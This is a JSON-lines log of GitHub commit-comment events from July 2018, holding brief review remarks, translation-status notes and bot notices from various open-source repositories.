{"id":"7902545245","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29556688,"position":18,"line":18,"path":"src/main/java/com/otus/spring/TestServiceImpl.java","commit_id":"39e4a82d624594a8b3bca22b8ed2958815cc64e2","created_at":"2018-07-01T06:37:32Z","updated_at":"2018-07-01T06:37:32Z","author_association":"NONE","body":"Вот я бы в TestDao псросто бы читал бы коллекцию вопросов. И здесь бы не пришлось бы генерировать здесь номера, тем более, что их непонятно сколько в общем случае."}},"created_at":"2018-07-01T06:37:32Z"}
{"id":"7902545812","type":"CommitCommentEvent","actor":{"login":"Shriyanshagro"},"repo":{"name":"collective/collective.ifttt"},"payload":{"comment":{"id":29556690,"position":4,"line":4,"path":"src/collective/ifttt/profiles/default/actions.xml","commit_id":"3c5c8a2f52d7a6678535e930ba8c0e02ec0c564e","created_at":"2018-07-01T06:38:09Z","updated_at":"2018-07-01T06:38:09Z","author_association":"COLLABORATOR","body":"done 👍 "}},"created_at":"2018-07-01T06:38:09Z"}
{"id":"7902546178","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29556691,"position":10,"line":10,"path":"src/main/java/com/otus/spring/TesterImpl.java","commit_id":"39e4a82d624594a8b3bca22b8ed2958815cc64e2","created_at":"2018-07-01T06:38:32Z","updated_at":"2018-07-01T06:38:32Z","author_association":"NONE","body":"ЛУчше в параметр консутруктора."}},"created_at":"2018-07-01T06:38:32Z"}
{"id":"7902546421","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29556692,"position":8,"line":8,"path":"src/main/java/com/otus/spring/TesterImpl.java","commit_id":"39e4a82d624594a8b3bca22b8ed2958815cc64e2","created_at":"2018-07-01T06:38:46Z","updated_at":"2018-07-01T06:38:46Z","author_association":"NONE","body":"А это в настройки/контекст."}},"created_at":"2018-07-01T06:38:46Z"}
{"id":"7902547029","type":"CommitCommentEvent","actor":{"login":"Wyqer"},"repo":{"name":"KillahPotatoes/KP-Liberation"},"payload":{"comment":{"id":29556693,"position":null,"line":null,"path":null,"commit_id":"a32ebbbf999ff840f864a2a111ee381a47e58916","created_at":"2018-07-01T06:39:28Z","updated_at":"2018-07-01T06:39:28Z","author_association":"MEMBER","body":"If KPLIB_preset_arsenal is set to 0 (mostly default) it won't set the arsenal validation to true, as it doesn't process an arsenal preset.\r\nSecond option to prevent that would've been to add the \"set to true\" at the following place, but I guess a if in the guard is more intuitive.\r\nhttps://github.com/KillahPotatoes/KP-Liberation/blob/v0.97S3-428/Missionframework/modules/00_init/fnc/fn_init_fillArsenal.sqf#L23"}},"created_at":"2018-07-01T06:39:28Z"}
{"id":"7902547263","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29556694,"position":null,"line":null,"path":null,"commit_id":"16e1d9364bcdd6b5bd54c46b1196f6282b145abf","created_at":"2018-07-01T06:39:41Z","updated_at":"2018-07-01T06:39:41Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/16e1d9364bcdd6b5bd54c46b1196f6282b145abf#commitcomment-29556363) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/50067217b3c0c59b30ef2e2641976e7ad473b558/daily_2018_7_1/report.md). cc @ararslan"}},"created_at":"2018-07-01T06:39:41Z"}
{"id":"7902555368","type":"CommitCommentEvent","actor":{"login":"manuel-uberti"},"repo":{"name":"mdallastella/.emacs.d"},"payload":{"comment":{"id":29556708,"position":null,"line":null,"path":null,"commit_id":"06543be16f5bdb6258eae27ac5aa422c1a70d006","created_at":"2018-07-01T06:47:37Z","updated_at":"2018-07-01T06:47:37Z","author_association":"NONE","body":"It's @manuel-uberti :)"}},"created_at":"2018-07-01T06:47:37Z"}
{"id":"7902555653","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29556709,"position":null,"line":null,"path":null,"commit_id":"d4a1a812a8eca981cd707358373b13c2c4c1a1f9","created_at":"2018-07-01T06:47:56Z","updated_at":"2018-07-01T06:47:56Z","author_association":"CONTRIBUTOR","body":"https://github.com/uBlockOrigin/uAssets/commit/199113980a9612cdb94ecff2a5606d46be82f4c7"}},"created_at":"2018-07-01T06:47:56Z"}
{"id":"7902557985","type":"CommitCommentEvent","actor":{"login":"phyriel"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29556714,"position":null,"line":null,"path":null,"commit_id":"4f7447f08104706c537e4fd119dfa4a0afa3b799","created_at":"2018-07-01T06:50:05Z","updated_at":"2018-07-01T06:50:05Z","author_association":"NONE","body":"Are you going to make your new script public? If not could you tell how its better? "}},"created_at":"2018-07-01T06:50:05Z"}
{"id":"7902563115","type":"CommitCommentEvent","actor":{"login":"mirraaj"},"repo":{"name":"Kaixhin/ACER"},"payload":{"comment":{"id":29556720,"position":null,"line":null,"path":null,"commit_id":"4326295297ad7c4c7accf6ffaae707432d4c6f0e","created_at":"2018-07-01T06:54:59Z","updated_at":"2018-07-01T06:54:59Z","author_association":"CONTRIBUTOR","body":"I see what the paper meant. However, I am not completely sure about this. Have you generated new results? There have been many changes to the repository. Please let me know your inputs to it."}},"created_at":"2018-07-01T06:54:59Z"}
{"id":"7902564211","type":"CommitCommentEvent","actor":{"login":"eladweiss"},"repo":{"name":"tensorflow/benchmarks"},"payload":{"comment":{"id":29556721,"position":13,"line":55,"path":"scripts/tf_cnn_benchmarks/data_utils.py","commit_id":"80c2d0bc270084913932737ab2963be490225988","created_at":"2018-07-01T06:56:05Z","updated_at":"2018-07-01T06:56:05Z","author_association":"NONE","body":"thanks!"}},"created_at":"2018-07-01T06:56:05Z"}
{"id":"7902564988","type":"CommitCommentEvent","actor":{"login":"sidneyxvr"},"repo":{"name":"sidneyxvr/AHP"},"payload":{"comment":{"id":29556725,"position":null,"line":null,"path":null,"commit_id":"cf3ab4b76615911a0823228461535dfe8dffb97c","created_at":"2018-07-01T06:56:52Z","updated_at":"2018-07-01T06:56:52Z","author_association":"OWNER","body":"sucesso"}},"created_at":"2018-07-01T06:56:52Z"}
{"id":"7902566003","type":"CommitCommentEvent","actor":{"login":"kou"},"repo":{"name":"groonga/groonga"},"payload":{"comment":{"id":29556726,"position":null,"line":null,"path":null,"commit_id":"7c408a2bd6ff05198952d82e7fec425082a963eb","created_at":"2018-07-01T06:57:53Z","updated_at":"2018-07-01T06:57:53Z","author_association":"MEMBER","body":"Should we add `defined(WIN32)` check?"}},"created_at":"2018-07-01T06:57:53Z"}
{"id":"7902569184","type":"CommitCommentEvent","actor":{"login":"saulpw"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556734,"position":77,"line":144,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T07:00:46Z","updated_at":"2018-07-01T07:00:46Z","author_association":"OWNER","body":"Nothing else uses setcell though, right?  Seems like then there should be setcell-edit or setcell-paste.  I'm not sure I like this one."}},"created_at":"2018-07-01T07:00:46Z"}
{"id":"7902572578","type":"CommitCommentEvent","actor":{"login":"saulpw"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556749,"position":77,"line":144,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T07:03:48Z","updated_at":"2018-07-01T07:03:48Z","author_association":"OWNER","body":"also, should it yank to the clipboard?  `cut-cell`?"}},"created_at":"2018-07-01T07:03:48Z"}
{"id":"7902581186","type":"CommitCommentEvent","actor":{"login":"LeoRX"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29556761,"position":null,"line":null,"path":null,"commit_id":"c2f82f1ac18ed7fb48be1eb8d678a3cf32192069","created_at":"2018-07-01T07:12:17Z","updated_at":"2018-07-01T07:12:17Z","author_association":"NONE","body":"bummer.. false hope.  :(\r\n"}},"created_at":"2018-07-01T07:12:17Z"}
{"id":"7902581382","type":"CommitCommentEvent","actor":{"login":"wuomzfx"},"repo":{"name":"umijs/umi"},"payload":{"comment":{"id":29556763,"position":null,"line":null,"path":null,"commit_id":"52c765f768a8faa81408a36149cf0ca71bdd9777","created_at":"2018-07-01T07:12:27Z","updated_at":"2018-07-01T07:12:27Z","author_association":"CONTRIBUTOR","body":"babel/polyfill 引入了整个core-js以及一个generator的runtime垫片。 raf/ployfill 仅是个浏览器重绘相关api（requestAnimationFrame/cancelAnimationFrame）的polyfill。与set/map一起，是react16自己表示需要增加的polyfill。 https://reactjs.org/docs/javascript-environment-requirements.html"}},"created_at":"2018-07-01T07:12:27Z"}
{"id":"7902582173","type":"CommitCommentEvent","actor":{"login":"PCORTINA"},"repo":{"name":"PCORTINA/sample-cloud-native-toolchain-tutorial-20180629135832828"},"payload":{"comment":{"id":29556766,"position":null,"line":null,"path":null,"commit_id":"9dbbe931f1174c1b16f51c30db6ad52e9c08a21b","created_at":"2018-07-01T07:13:08Z","updated_at":"2018-07-01T07:13:08Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/e49039fa-0d6a-4a42-83ca-bf06f016180e?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180629135832828\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/514a6b20-e043-4908-a015-5cc6932215f6?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180629135832828\") deployed [sample-cloud-native-toolchain-tutorial-20180629135832828](https://github.com/PCORTINA/sample-cloud-native-toolchain-tutorial-20180629135832828/releases/tag/deploy-ibm-yp-eu-gb-paula_cortina-es.ibm.com-test-20180701-071307 \"deploy-ibm-yp-eu-gb-paula_cortina-es.ibm.com-test-20180701-071307\") to [test](https://console.bluemix.net/apps/794bde0c-4638-40e7-ad03-9184f8dfe147?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:paula_cortina@es.ibm.com:test\"), including this commit"}},"created_at":"2018-07-01T07:13:08Z"}
{"id":"7902582436","type":"CommitCommentEvent","actor":{"login":"barrystyle"},"repo":{"name":"216k155/lux"},"payload":{"comment":{"id":29556768,"position":null,"line":null,"path":null,"commit_id":"ea452d77d2fb6a1b185becc5431abed1966a212a","created_at":"2018-07-01T07:13:24Z","updated_at":"2018-07-01T07:13:24Z","author_association":"NONE","body":"nicely done."}},"created_at":"2018-07-01T07:13:24Z"}
{"id":"7902582754","type":"CommitCommentEvent","actor":{"login":"YaminTheint9999"},"repo":{"name":"hsuyeemon/UIT-ThirdYr-AgriculturalTradingSystem"},"payload":{"comment":{"id":29556771,"position":null,"line":null,"path":null,"commit_id":"d5d9a03e040094f377e067129f621fdd5414ff00","created_at":"2018-07-01T07:13:46Z","updated_at":"2018-07-01T07:13:46Z","author_association":"COLLABORATOR","body":"ngr lr p xd"}},"created_at":"2018-07-01T07:13:46Z"}
{"id":"7902583915","type":"CommitCommentEvent","actor":{"login":"bobtiki"},"repo":{"name":"bobtiki/letterboxd"},"payload":{"comment":{"id":29556779,"position":null,"line":null,"path":null,"commit_id":"499c7ca6d94fdb6b70d5df285a4bbbc0093bb7a2","created_at":"2018-07-01T07:14:37Z","updated_at":"2018-07-01T07:14:37Z","author_association":"OWNER","body":"Closes #16 "}},"created_at":"2018-07-01T07:14:37Z"}
{"id":"7902584419","type":"CommitCommentEvent","actor":{"login":"xiaohuoni"},"repo":{"name":"umijs/umi"},"payload":{"comment":{"id":29556783,"position":null,"line":null,"path":null,"commit_id":"52c765f768a8faa81408a36149cf0ca71bdd9777","created_at":"2018-07-01T07:15:09Z","updated_at":"2018-07-01T07:15:09Z","author_association":"CONTRIBUTOR","body":"谢谢，学习了"}},"created_at":"2018-07-01T07:15:09Z"}
{"id":"7902586443","type":"CommitCommentEvent","actor":{"login":"PCORTINA"},"repo":{"name":"PCORTINA/sample-cloud-native-toolchain-tutorial-20180629135832828"},"payload":{"comment":{"id":29556789,"position":null,"line":null,"path":null,"commit_id":"9dbbe931f1174c1b16f51c30db6ad52e9c08a21b","created_at":"2018-07-01T07:17:04Z","updated_at":"2018-07-01T07:17:04Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/e49039fa-0d6a-4a42-83ca-bf06f016180e?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180629135832828\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/514a6b20-e043-4908-a015-5cc6932215f6?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180629135832828\") deployed [sample-cloud-native-toolchain-tutorial-20180629135832828](https://github.com/PCORTINA/sample-cloud-native-toolchain-tutorial-20180629135832828/releases/tag/deploy-ibm-yp-eu-gb-paula_cortina-es.ibm.com-prod-20180701-071702 \"deploy-ibm-yp-eu-gb-paula_cortina-es.ibm.com-prod-20180701-071702\") to [prod](https://console.bluemix.net/apps/147f09d0-7a7d-4521-ae79-d1882c2751bc?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:paula_cortina@es.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-01T07:17:04Z"}
{"id":"7902588258","type":"CommitCommentEvent","actor":{"login":"MohammadALHamalawy"},"repo":{"name":"Yenthe666/auto_backup"},"payload":{"comment":{"id":29556791,"position":null,"line":null,"path":null,"commit_id":"23e809b2e7bc2eff72550cd3cb26489774f32253","created_at":"2018-07-01T07:18:48Z","updated_at":"2018-07-01T07:18:48Z","author_association":"NONE","body":"Hi Mr. Yenthe \r\nplease, i wanna know the duration between each backup? "}},"created_at":"2018-07-01T07:18:48Z"}
{"id":"7902588696","type":"CommitCommentEvent","actor":{"login":"mgsweet"},"repo":{"name":"longjj/MineCube"},"payload":{"comment":{"id":29556793,"position":27,"line":24,"path":"include/crud.h","commit_id":"889f263c80616bff6893838e3717a322e7bebe9e","created_at":"2018-07-01T07:19:13Z","updated_at":"2018-07-01T07:19:13Z","author_association":"COLLABORATOR","body":"看你的DEBUG信息应该是没找到我那个前缀的意思，所以我感觉是cmake的问题，不知道其他人有没这个问题"}},"created_at":"2018-07-01T07:19:13Z"}
{"id":"7902588916","type":"CommitCommentEvent","actor":{"login":"saulpw"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556794,"position":54,"line":63,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T07:19:25Z","updated_at":"2018-07-01T07:19:25Z","author_association":"OWNER","body":"Yup, good catch.  But I'm wondering about the 'verb' `aggregate` anyway; does it capture \"add an aggregator for later\" or does it too strongly imply \"aggregate it now\"?"}},"created_at":"2018-07-01T07:19:25Z"}
{"id":"7902598216","type":"CommitCommentEvent","actor":{"login":"bobtiki"},"repo":{"name":"bobtiki/letterboxd"},"payload":{"comment":{"id":29556815,"position":null,"line":null,"path":null,"commit_id":"ef242bda9c4d9fa167f2f0171eda9e1bede77b4c","created_at":"2018-07-01T07:28:05Z","updated_at":"2018-07-01T07:28:05Z","author_association":"OWNER","body":"Close #15 "}},"created_at":"2018-07-01T07:28:05Z"}
{"id":"7902598465","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556816,"position":280,"line":145,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:28:18Z","updated_at":"2018-07-01T07:28:18Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:28:18Z"}
{"id":"7902598546","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556817,"position":289,"line":156,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:28:24Z","updated_at":"2018-07-01T07:28:24Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:28:24Z"}
{"id":"7902598698","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556818,"position":321,"line":181,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:28:32Z","updated_at":"2018-07-01T07:28:32Z","author_association":"COLLABORATOR","body":"Fixed"}},"created_at":"2018-07-01T07:28:32Z"}
{"id":"7902598870","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556819,"position":371,"line":227,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:28:42Z","updated_at":"2018-07-01T07:28:42Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:28:42Z"}
{"id":"7902599029","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556820,"position":416,"line":270,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:28:50Z","updated_at":"2018-07-01T07:28:50Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:28:50Z"}
{"id":"7902599775","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556822,"position":424,"line":276,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:29:33Z","updated_at":"2018-07-01T07:29:33Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:29:33Z"}
{"id":"7902600438","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556824,"position":444,"line":293,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:30:09Z","updated_at":"2018-07-01T07:30:09Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:30:09Z"}
{"id":"7902600476","type":"CommitCommentEvent","actor":{"login":"Timerise"},"repo":{"name":"Timerise/Quick-EDA-Modeling"},"payload":{"comment":{"id":29556825,"position":null,"line":null,"path":null,"commit_id":"5f47c09a12369e9584c79ca6e59f834175ff7d22","created_at":"2018-07-01T07:30:10Z","updated_at":"2018-07-01T07:30:10Z","author_association":"OWNER","body":"updated file 1"}},"created_at":"2018-07-01T07:30:10Z"}
{"id":"7902600813","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556829,"position":510,"line":360,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:30:25Z","updated_at":"2018-07-01T07:30:25Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:30:25Z"}
{"id":"7902600974","type":"CommitCommentEvent","actor":{"login":"Timerise"},"repo":{"name":"Timerise/Quick-EDA-Modeling"},"payload":{"comment":{"id":29556830,"position":null,"line":null,"path":null,"commit_id":"5f47c09a12369e9584c79ca6e59f834175ff7d22","created_at":"2018-07-01T07:30:33Z","updated_at":"2018-07-01T07:30:33Z","author_association":"OWNER","body":"?"}},"created_at":"2018-07-01T07:30:33Z"}
{"id":"7902601223","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556831,"position":529,"line":379,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:30:47Z","updated_at":"2018-07-01T07:30:47Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:30:47Z"}
{"id":"7902601433","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556832,"position":612,"line":462,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:30:58Z","updated_at":"2018-07-01T07:30:58Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:30:58Z"}
{"id":"7902601782","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556835,"position":622,"line":472,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:31:17Z","updated_at":"2018-07-01T07:31:17Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:31:17Z"}
{"id":"7902601855","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556836,"position":631,"line":481,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:31:21Z","updated_at":"2018-07-01T07:31:21Z","author_association":"COLLABORATOR","body":"updated (more strings have been added)"}},"created_at":"2018-07-01T07:31:21Z"}
{"id":"7902602037","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556837,"position":634,"line":484,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:31:32Z","updated_at":"2018-07-01T07:31:32Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:31:32Z"}
{"id":"7902602254","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556838,"position":646,"line":496,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:31:44Z","updated_at":"2018-07-01T07:31:44Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:31:44Z"}
{"id":"7902602472","type":"CommitCommentEvent","actor":{"login":"tbejos"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29556839,"position":null,"line":null,"path":null,"commit_id":"7172476e3b27a465a429122c5cd3a3d3fb51706f","created_at":"2018-07-01T07:31:57Z","updated_at":"2018-07-01T07:31:57Z","author_association":"NONE","body":"Is it possible to have it also highlight your own progress so that you can easily check how you are doing without needing to read through all of the account listed to find your name?"}},"created_at":"2018-07-01T07:31:57Z"}
{"id":"7902602913","type":"CommitCommentEvent","actor":{"login":"xPaw"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29556840,"position":null,"line":null,"path":null,"commit_id":"7172476e3b27a465a429122c5cd3a3d3fb51706f","created_at":"2018-07-01T07:32:20Z","updated_at":"2018-07-01T07:32:20Z","author_association":"MEMBER","body":"Put your full `gettoken` in `token.txt` and it will highlight."}},"created_at":"2018-07-01T07:32:20Z"}
{"id":"7902603111","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556843,"position":648,"line":498,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:32:29Z","updated_at":"2018-07-01T07:32:29Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:32:29Z"}
{"id":"7902603397","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556844,"position":687,"line":537,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:32:46Z","updated_at":"2018-07-01T07:32:46Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:32:46Z"}
{"id":"7902603499","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556845,"position":689,"line":539,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:32:52Z","updated_at":"2018-07-01T07:32:52Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:32:52Z"}
{"id":"7902603575","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556846,"position":706,"line":556,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:32:56Z","updated_at":"2018-07-01T07:32:56Z","author_association":"COLLABORATOR","body":"no need to update"}},"created_at":"2018-07-01T07:32:56Z"}
{"id":"7902603676","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556848,"position":713,"line":563,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:33:03Z","updated_at":"2018-07-01T07:33:03Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:33:03Z"}
{"id":"7902603711","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556849,"position":716,"line":566,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:33:06Z","updated_at":"2018-07-01T07:33:06Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:33:06Z"}
{"id":"7902603765","type":"CommitCommentEvent","actor":{"login":"tbejos"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29556850,"position":null,"line":null,"path":null,"commit_id":"7172476e3b27a465a429122c5cd3a3d3fb51706f","created_at":"2018-07-01T07:33:09Z","updated_at":"2018-07-01T07:33:09Z","author_association":"NONE","body":"Ah, I haven't update my token in a long time and just had my tokenid, thanks!"}},"created_at":"2018-07-01T07:33:09Z"}
{"id":"7902603794","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556851,"position":730,"line":580,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:33:10Z","updated_at":"2018-07-01T07:33:10Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:33:10Z"}
{"id":"7902603963","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556853,"position":939,"line":789,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:33:18Z","updated_at":"2018-07-01T07:33:18Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:33:18Z"}
{"id":"7902604053","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556855,"position":943,"line":793,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:33:23Z","updated_at":"2018-07-01T07:33:23Z","author_association":"COLLABORATOR","body":"no need to update"}},"created_at":"2018-07-01T07:33:23Z"}
{"id":"7902604114","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556856,"position":945,"line":795,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:33:26Z","updated_at":"2018-07-01T07:33:26Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:33:26Z"}
{"id":"7902604159","type":"CommitCommentEvent","actor":{"login":"shubhamkakkar"},"repo":{"name":"umang189/Team-4"},"payload":{"comment":{"id":29556857,"position":null,"line":null,"path":null,"commit_id":"dd0c3b1a5f95153bbf13ea486a6b61e657aab8d6","created_at":"2018-07-01T07:33:28Z","updated_at":"2018-07-01T07:33:28Z","author_association":"NONE","body":"Hey, your web-application would be using which front-end framework, like vue/react/angular?\r\nI am in team-12 and I saw your idea,I really liked it.\r\nI am a front end developer comfortable in working with vue[primarily](1 year experiance) besides having 2year experaince with html, css, vanillaJS, bootstrap, ajax and jquery.\r\nI intrested ping on the slack"}},"created_at":"2018-07-01T07:33:28Z"}
{"id":"7902604255","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556858,"position":965,"line":815,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:33:33Z","updated_at":"2018-07-01T07:33:33Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:33:33Z"}
{"id":"7902604523","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556859,"position":975,"line":825,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:33:49Z","updated_at":"2018-07-01T07:33:49Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:33:49Z"}
